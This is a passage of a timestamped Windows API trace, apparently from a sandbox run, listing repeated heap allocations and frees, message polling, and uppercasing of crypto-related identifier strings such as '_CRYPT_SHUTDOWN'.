hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0130.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0130.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0130.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0130.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0130.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0130.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0130.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0130.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0130.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0130.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0130.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0130.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0130.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0130.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0130.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0130.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0130.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0130.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0130.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0130.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0130.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0130.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16520) returned 0x2ef97e0 [0130.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0130.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0130.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0130.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0130.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0130.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0130.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0130.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16520) returned 0x2f0fd08 [0130.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ef97e0 | out: hHeap=0x970000) returned 1 [0130.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.793] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0130.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0130.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0130.793] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0130.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0130.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0130.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0130.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0130.794] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0130.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0130.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0130.794] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0130.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0130.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0130.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.794] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0130.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0130.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0130.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0130.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0130.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0130.796] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.796] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0130.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0130.796] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0130.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.796] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0130.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0130.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0130.797] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0130.797] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0130.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0130.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0130.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16520) returned 0x2ef97e0 [0130.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0130.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16520) returned 0x2f26230 [0130.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ef97e0 | out: hHeap=0x970000) returned 1 [0130.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0130.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0130.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0130.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16520) returned 0x2ef97e0 [0130.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26230 | out: hHeap=0x970000) returned 1 [0130.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0130.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16520) returned 0x2f26230 [0130.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ef97e0 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0130.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.812] 